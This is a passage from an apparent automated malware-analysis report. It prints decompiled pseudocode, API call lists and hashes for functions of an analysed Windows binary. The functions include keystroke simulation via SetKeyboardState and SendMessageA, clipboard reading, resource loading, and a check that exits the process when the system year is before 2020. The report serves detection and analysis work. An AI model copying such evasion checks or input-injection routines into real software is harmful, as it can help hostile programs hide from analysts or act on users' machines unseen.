				_v12 = _t133;
				if(E0045BB80(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E0045B868(_v8,  &_v540);
					_t75 = E004045D8(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E0045B868(_v8,  &_v544);
						_v12 = E004045D8(_v544);
					}
					E0045BD7C(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E0045B868(_v8,  &_v532);
					if(_t135 < E004045D8(_v532)) {
						E0045B868(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0x366855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E0045BD7C(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x45c007);
						return E00404344( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x471c44 + (E004037B0(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x45bf6e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037B0(_v8, _t177);
						SendMessageA(E0043F370(_v8), 0x100,  *(0x471c44 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037B0(_v8, _t177);
						SendMessageA(E0043F370(_v8), 0x101,  *(0x471c44 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x45bf75);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}

0x0045bda1
0x0045bda3
0x0045bdad
0x0045bdb3
0x0045bdb9
0x0045bdbf
0x0045bdc5
0x0045bdcb
0x0045bdcd
0x0045bdd2
0x0045bdd3
0x0045bdd8
0x0045bddb
0x0045bde1
0x0045bdec
0x0045be00
0x0045be02
0x0045be02
0x0045be00
0x0045be03
0x0045be10
0x0045bf8f
0x0045bf93
0x0045bf95
0x0045bf97
0x0045bf97
0x0045bfa3
0x0045bfae
0x0045bfb3
0x0045bfb6
0x0045bfc1
0x0045bfd1
0x0045bfd1
0x0045bfdd
0x00000000
0x0045be16
0x0045be1a
0x0045be1e
0x0045be1e
0x0045be24
0x0045be2e
0x0045be40
0x0045be4b
0x0045be65
0x0045be68
0x0045be6a
0x0045be6a
0x0045be68
0x0045be6e
0x0045be6e
0x0045be77
0x0045be79
0x0045be7c
0x0045be7c
0x0045be86
0x0045be8e
0x0045bf87
0x0045bfe2
0x0045bfe2
0x0045bfe4
0x0045bfe7
0x0045bfea
0x0045bfff
0x0045be94
0x0045be9b
0x0045bea0
0x0045bea5
0x0045beab
0x0045beab
0x0045beae
0x0045beaf
0x0045beaf
0x0045beaf
0x0045beb2
0x0045bed0
0x0045bedf
0x0045bee7
0x0045bef0
0x0045bef1
0x0045bef6
0x0045bef9
0x0045bf05
0x0045bf24
0x0045bf32
0x0045bf51
0x0045bf58
0x0045bf5b
0x0045bf5e
0x0045bf63
0x0045bf66
0x0045bf6d
0x0045bf6d
0x0045be8e

APIs

GetKeyboardState.USER32(?,00000000,0045C000), ref: 0045BE9B
SetKeyboardState.USER32(00000081), ref: 0045BEDF
SendMessageA.USER32 ref: 0045BF24
SendMessageA.USER32 ref: 0045BF51

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessageSendState
String ID:
API String ID: 1999190242-0
Opcode ID: b4217af07094c55ecbd976ae125b8c178fdf7f3afcd6a3f811cffb544f4c981f
Instruction ID: 23adf5d4f7e529b058c66d1fba4eb5591ab85889e37c0514321d0d6710f047e4
Opcode Fuzzy Hash: b4217af07094c55ecbd976ae125b8c178fdf7f3afcd6a3f811cffb544f4c981f
Instruction Fuzzy Hash: DE6140749006089FCB10EF69C886ADDB7B4EB59305F6045EAE844E7392D7386E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00416D64, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00416D64(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00416CF4(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416b04
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00416CF4(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416b04
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416630
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416AC4(_t23, _t25, _t18);
			}

0x00416d6b
0x00416d6e
0x00416d70
0x00416d80
0x00416d82
0x00416d85
0x00416d87
0x00416d8a
0x00416d8f
0x00416d8f
0x00416d90
0x00416d9a
0x00416d9c
0x00416d9f
0x00416da1
0x00416da4
0x00416da9
0x00416daa
0x00416db4
0x00416db5
0x00416db9
0x00416dc2
0x00416dcd

APIs

FindResourceA.KERNEL32(?,?,?), ref: 00416D7B
LoadResource.KERNEL32(?,00416B04,?,?,?,004122D8,?,00000001,00000000,?,00416CD4,?), ref: 00416D95
SizeofResource.KERNEL32(?,00416B04,?,00416B04,?,?,?,004122D8,?,00000001,00000000,?,00416CD4,?), ref: 00416DAF
LockResource.KERNEL32(00416630,00000000,?,00416B04,?,00416B04,?,?,?,004122D8,?,00000001,00000000,?,00416CD4,?), ref: 00416DB9

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 2545eb823e597b0ef761e8e65bfbd6e12f6e5d90b9f745f036ca9c39330fd95c
Instruction ID: 7a047066e4020fb3ec365297d1a117ace91cb6e4aebfddfd9ce2b1495baa0238
Opcode Fuzzy Hash: 2545eb823e597b0ef761e8e65bfbd6e12f6e5d90b9f745f036ca9c39330fd95c
Instruction Fuzzy Hash: 98F0ADB36052006F8B04EF5DA881D9B73ECEE88264316006FFD08D7202DA38ED1083B8

Uniqueness

Uniqueness Score: -1.00%

Function 0043372C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0043372C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x4337a9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00433178(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00432DD0(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047D0(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x4337b0);
				return E00404320( &_v8);
			}

0x0043372f
0x00433733
0x00433737
0x00433738
0x0043373d
0x00433740
0x00433745
0x0043374f
0x00433751
0x00433753
0x0043375f
0x0043376d
0x00433776
0x0043377f
0x0043378e
0x0043378e
0x00433795
0x00433798
0x0043379b
0x004337a8

APIs

Part of subcall function 00433178: WinHelpA.USER32 ref: 00433187

GetTickCount.KERNEL32 ref: 0043374A
Sleep.KERNEL32(00000000,00000000,004337A9,?,?,00000000,00000000,?,0043371F), ref: 00433753
GetTickCount.KERNEL32 ref: 00433758
WinHelpA.USER32 ref: 0043378E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: a9943fa7b5c6a1866caac57e232b25b3193c51454412981fe94a60469e8aea57
Instruction ID: 8accd2dc7a28ac9191b1abc83bbd48f8ecd30135b0fd31469ffce50d41439bbb
Opcode Fuzzy Hash: a9943fa7b5c6a1866caac57e232b25b3193c51454412981fe94a60469e8aea57
Instruction Fuzzy Hash: D001A2B0600204AFE711EBA6DD42B1DB3A8DB4D709F61507BF500E6AC1DB7CAE048559

Uniqueness

Uniqueness Score: -1.00%

Function 0043CE20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043CE20(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00439460(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00439F70(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043CD8C(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043F674(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0043F370(_t50);
						_push(_t32);
						L00406D08();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E00439F70(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407260( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E00438800(_t50,  &_v28,  &_v20);
					_t21 = E0043CCF8(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E004500B0(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043F370(__eax);
						if(_t45 == GetCapture() &&  *0x471990 != 0) {
							_t47 =  *0x471990; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x471990; // 0x0
								E00439EA4(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x0043ce26
0x0043ce28
0x0043ce2a
0x0043ce2c
0x0043ce31
0x0043ce50
0x0043ce53
0x0043cf30
0x0043cf37
0x0043cf82
0x0043cf82
0x0043cf82
0x0043cf73
0x00000000
0x0043cf77
0x0043ce61
0x0043cefa
0x0043cf01
0x00000000
0x00000000
0x0043cf07
0x00000000
0x00000000
0x0043cf0b
0x0043cf12
0x00000000
0x00000000
0x0043cf17
0x0043cf1b
0x0043cf1e
0x0043cf21
0x0043cf26
0x0043cf27
0x00000000
0x0043cf27
0x00000000
0x0043ce67
0x0043ce33
0x0043cea9
0x0043ceb2
0x00000000
0x00000000
0x0043cec1
0x0043ced0
0x0043cedd
0x0043cee4
0x00000000
0x00000000
0x0043ceea
0x00000000
0x0043ceea
0x0043ce35
0x0043ce38
0x0043ce73
0x0043ce77
0x00000000
0x00000000
0x0043ce83
0x0043ce8b
0x00000000
0x00000000
0x00000000
0x0043ce91
0x0043ce3a
0x0043ce3b
0x0043ce9a
0x00000000
0x00000000
0x0043ce3d
0x0043ce40
0x0043cf3d
0x0043cf4b
0x0043cf56
0x0043cf5e
0x0043cf69
0x0043cf6e
0x0043cf6e
0x0043cf5e
0x0043cf4b
0x0043ce40

APIs

GetCapture.USER32 ref: 0043CF44

Strings

, xrefs: 0043CE96

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 2a1b0f335cfb047a4e136eb7a30ad2bf1dc10676cf6e92bdf0c91ebf052f28ad
Instruction ID: 43acd932db1cddca358a2b5833d55645959fd90ebcfa15af3ebc567744cec2f9
Opcode Fuzzy Hash: 2a1b0f335cfb047a4e136eb7a30ad2bf1dc10676cf6e92bdf0c91ebf052f28ad
Instruction Fuzzy Hash: 98318C7160420097C720AB3DC8C675A72969B4E398F14A53FB456E73E6DB7CDC0A874D

Uniqueness

Uniqueness Score: -1.00%

Function 0043258C, Relevance: 4.5, APIs: 3, Instructions: 43
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0043258C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx) {
				intOrPtr* _v8;
				void* _v12;
				void* _t27;
				intOrPtr _t33;
				void* _t36;
				void* _t38;

				_t27 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(__ebx, _t36);
				_v12 = GetClipboardData(1);
				_push(_t38);
				_push(0x4325fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38 + 0xfffffff8;
				if(_v12 == 0) {
					E00404320(_t27);
				} else {
					GlobalFix(_v12);
					E00404510(_t27, _v12);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x432605);
				if(_v12 != 0) {
					GlobalUnWire(_v12);
				}
				return  *((intOrPtr*)( *_v8 + 0x14))();
			}

0x00432593
0x00432595
0x0043259d
0x004325a7
0x004325ac
0x004325ad
0x004325b2
0x004325b5
0x004325bc
0x004325d4
0x004325be
0x004325c2
0x004325cb
0x004325cb
0x004325db
0x004325de
0x004325e1
0x004325ea
0x004325f0
0x004325f0
0x004325fd

APIs

GetClipboardData.USER32 ref: 004325A2
GlobalFix.KERNEL32 ref: 004325C2
GlobalUnWire.KERNEL32(00000000), ref: 004325F0

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$ClipboardDataWire
String ID:
API String ID: 2697403597-0
Opcode ID: 268b32843f98601f9ed9c1661c6937a6bf6279bcea56f4c782d6d164bb799586
Instruction ID: 35f6f909bc2008549d8956aa6d9fb14dd378a360ce455bc94c4d4bb27f10abc6
Opcode Fuzzy Hash: 268b32843f98601f9ed9c1661c6937a6bf6279bcea56f4c782d6d164bb799586
Instruction Fuzzy Hash: 7F019A70A00204EFCB00DFA9CA55A8EB7B4EB4C300F2140B6B501A7691DA789E90DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004574D0, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004574D0() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x48fc0c = GetCurrentThreadId();
				L5:
				_t5 =  *0x48fc10; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x48fbfc != 0 &&  *((intOrPtr*)( *0x48fbfc + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E00437534( &_v12) == 0) {
							E00459870( *0x48fbfc);
						}
					}
					goto L5;
				}
				return _t6;
			}

0x004574e1
0x00457511
0x00457513
0x00457519
0x00457523
0x004574eb
0x004574f9
0x00457508
0x0045750c
0x0045750c
0x00457508
0x00000000
0x004574eb
0x00457529

APIs

GetCurrentThreadId.KERNEL32 ref: 004574DC
GetCursorPos.USER32(?), ref: 004574F9
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00457519

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: a58b5eb6d08d89c790b83732d624bfe9ffd36f7db25992e6818a3d146b86ff75
Instruction ID: b648779530b1b9d472df8d98ef6d4c4ce2de8558f9b4746ab8b2fefce9ed3ee3
Opcode Fuzzy Hash: a58b5eb6d08d89c790b83732d624bfe9ffd36f7db25992e6818a3d146b86ff75
Instruction Fuzzy Hash: 19F0B47151820CABDB10F765EC86B5A339CAB0131AF4048BBED01D62D2EB3DD998C71D

Uniqueness

Uniqueness Score: -1.00%

Function 004703B0, Relevance: 4.5, APIs: 3, Instructions: 18
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004703B0(signed int __eax) {
				signed int _t3;
				signed int _t6;
				struct _SYSTEMTIME* _t8;

				_t3 = __eax;
				_t6 = __eax;
				GetSystemTime(_t8);
				if(_t8->wYear < 0x7e4) {
					ExitProcess(0);
				}
				_push(0);
				L00406C68();
				return _t3 & 0xffffff00 | _t6 == 0x80000001;
			}

0x004703b0
0x004703b4
0x004703b7
0x004703c2
0x004703c6
0x004703c6
0x004703d6
0x004703d8
0x004703e3

APIs

GetSystemTime.KERNEL32 ref: 004703B7
ExitProcess.KERNEL32(00000000), ref: 004703C6
6E1625A0.OPENGL32(00000000), ref: 004703D8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: E1625ExitProcessSystemTime
String ID:
API String ID: 839389509-0
Opcode ID: 6d6afbdbfd0c0f971f8f4c6101cfce2909d56d654d61b92e545c40d4e0795ad8
Instruction ID: ece89120a57ec2b3e6381a3ffa9659a35ffcfc5582ea46c19b3631b3ee57f7f0
Opcode Fuzzy Hash: 6d6afbdbfd0c0f971f8f4c6101cfce2909d56d654d61b92e545c40d4e0795ad8
Instruction Fuzzy Hash: 90D0C74174A20016EA5036750DC37AD10449701735F55493FFD59993C2D5AE05B4517B

Uniqueness

Uniqueness Score: -1.00%

Function 0043E4F4, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043E4F4(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0043E444(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x48e6ec; // 0x48fbfc
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E004500B0(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00439EA4(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}

0x0043e4fa
0x0043e4fd
0x0043e50f
0x0043e56d
0x0043e57d
0x0043e58c
0x00000000
0x0043e593
0x0043e582
0x0043e58a
0x00000000
0x00000000
0x0043e53e
0x0043e53e
0x0043e548
0x00000000
0x0043e54a
0x0043e54c
0x0043e551
0x0043e555
0x00000000
0x0043e557
0x0043e564
0x0043e56b
0x00000000
0x00000000
0x0043e56b
0x0043e555
0x0043e548
0x0043e59a

APIs

IsIconic.USER32 ref: 0043E52C
GetCapture.USER32 ref: 0043E535

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 111bcf99bdd9a8e416fb45b7f80940d8edb6b0b5147044fe8d06d636342efa33
Instruction ID: 81b4d58bb38cd2491c99ed8dd3ea13819e987d2c4e8a4a2e139a2dc2f90a531e
Opcode Fuzzy Hash: 111bcf99bdd9a8e416fb45b7f80940d8edb6b0b5147044fe8d06d636342efa33
Instruction Fuzzy Hash: 60118231701205EBEB20EB9AC58596AB3E5AF0C348F64647AF404EB392FB78DD049748

Uniqueness

Uniqueness Score: -1.00%

Function 00420594, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00420594(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x420630);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00420540(_t22);
				} else {
					E00404588( &_v264, 0x100,  &_v260);
					E0040A0E8(_v264, 1);
					E00403D80();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00420637);
				return E00404320( &_v264);
			}

0x004205a0
0x004205a8
0x004205a9
0x004205ae
0x004205b1
0x004205b9
0x004205bd
0x00420612
0x004205e3
0x004205f4
0x00420606
0x0042060b
0x0042060b
0x00420619
0x0042061c
0x0042061f
0x0042062f

APIs

GetLastError.KERNEL32(00000000,00420630,?,00000000,?,00420648,00000000,00423F6F,00000000,00000000,0042410F,?,00000000,?,?), ref: 004205B4
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00420630,?,00000000,?,00420648,00000000,00423F6F,00000000), ref: 004205DA

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6ccfb14fa0d11755d6d08eef36658aea9c81fa97476b82b2bca2a1dbf23e35c6
Instruction ID: ddd67f150343a9a78a1b5952b59a894d77cac6f74691603cb54e20a43b9da6d7
Opcode Fuzzy Hash: 6ccfb14fa0d11755d6d08eef36658aea9c81fa97476b82b2bca2a1dbf23e35c6
Instruction Fuzzy Hash: 1101D8703002186BE711EB619C92BD5B2E8DB84704F91447BBA44A22C2DAB86D54891D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040ACF0(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40ad54);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404588( &_v16, 7,  &_v11);
				_push(_v16);
				E00408740(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040AD5B);
				return E00404320( &_v16);
			}

0x0040acf0
0x0040acf9
0x0040acfe
0x0040acff
0x0040ad04
0x0040ad07
0x0040ad16
0x0040ad26
0x0040ad2e
0x0040ad37
0x0040ad40
0x0040ad43
0x0040ad46
0x0040ad53

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AD54), ref: 0040AD16
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AD54), ref: 0040AD2F

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
